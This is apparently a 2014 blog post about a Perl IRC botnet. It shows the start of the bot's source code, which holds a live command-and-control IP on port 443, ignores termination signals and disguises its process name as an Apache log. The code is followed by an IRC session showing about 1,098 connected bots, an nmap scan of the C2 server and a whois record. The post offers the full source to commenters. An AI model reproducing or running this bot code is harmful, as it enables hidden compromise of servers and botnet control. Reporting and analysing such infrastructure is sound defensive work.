Tuesday, October 7, 2014

1k Perl Bot - 94.102.63.238 -

// botnet source (for full source, comment)
my $linas_max='2';
my $sleep='5';
my @adms=("X", "Y");
my @hostauth=("localhost");
my @canais=("#new");
my $nick='PHP';
my $ircname ='PHP';
chop (my $realname = `uname -sr`);
$servidor='94.102.63.238' unless $servidor;
my $porta='443';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="'/usr/sbin/apache/log'�"x16;

 * Connecting to 94.102.63.238 port 443...
* There are 1 users and 1097 invisible on 1 servers
* 1 :operator(s) online
* 25 :unknown connection(s)
* 5 :channels formed
* I have 1098 clients and 0 servers
* 1098 4012 :Current local users 1098, max 4012
* 1098 1112 :Current global users 1098, max 1112

 * Nmap scan report for hosted-for-minecraft.net (94.102.63.238)
Host is up (0.071s latency).
Not shown: 995 closed ports
PORT    STATE    SERVICE VERSION
22/tcp  open     ssh     OpenSSH 5.9p1 Debian 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 f5:c1:7e:70:09:2d:c2:41:fa:67:f4:2a:7e:50:1a:f0 (DSA)
|   2048 8c:d7:ca:73:31:c3:47:b3:54:70:27:be:ec:5c:70:91 (RSA)
|_  256 58:d3:27:7a:7b:1a:1b:56:8c:2a:07:42:e1:24:91:90 (ECDSA)
25/tcp  filtered smtp
80/tcp  open     http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
135/tcp filtered msrpc
443/tcp open     irc     Unreal ircd
| irc-info: 
|   server: irc.foonet.com
|   version: Unreal3.2.10.1. irc.foonet.com 
|   servers: 1
|   ops: 1
|   chans: 5
|   users: 1100
|   lservers: 0
|   lusers: 1100
|   uptime: 0 days, 18:06:24
|   source host: 7DE75DA1.C67917B8.7CED0DBF.IP
|_  source ident: nmap
Service Info: Host: irc.foonet.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel


NetRange:       94.0.0.0 - 94.255.255.255
CIDR:           94.0.0.0/8
OriginAS:       
NetName:        94-RIPE
NetHandle:      NET-94-0-0-0-1
Parent:         
NetType:        Allocated to RIPE NCC
Comment:        These addresses have been further assigned to users in
Comment:        the RIPE NCC region. Contact information can be found in
Comment:        the RIPE database at http://www.ripe.net/whois
RegDate:        2007-07-30
Updated:        2009-05-18
Ref:            http://whois.arin.net/rest/net/NET-94-0-0-0-1

OrgName:        RIPE Network Coordination Centre
OrgId:          RIPE
Address:        P.O. Box 10096
City:           Amsterdam
StateProv:      
PostalCode:     1001EB
Country:        NL
RegDate:        
Updated:        2013-07-29
Ref:            http://whois.arin.net/rest/org/RIPE

ReferralServer: whois://whois.ripe.net:43

OrgTechHandle: RNO29-ARIN
OrgTechName:   RIPE NCC Operations
OrgTechPhone:  +31 20 535 4444 
OrgTechEmail:  hostmaster@ripe.net
OrgTechRef:    http://whois.arin.net/rest/poc/RNO29-ARIN

OrgAbuseHandle: ABUSE3850-ARIN
OrgAbuseName:   Abuse Contact
OrgAbusePhone:  +31205354444 
OrgAbuseEmail:  abuse@ripe.net
OrgAbuseRef:    http://whois.arin.net/rest/poc/ABUSE3850-ARIN
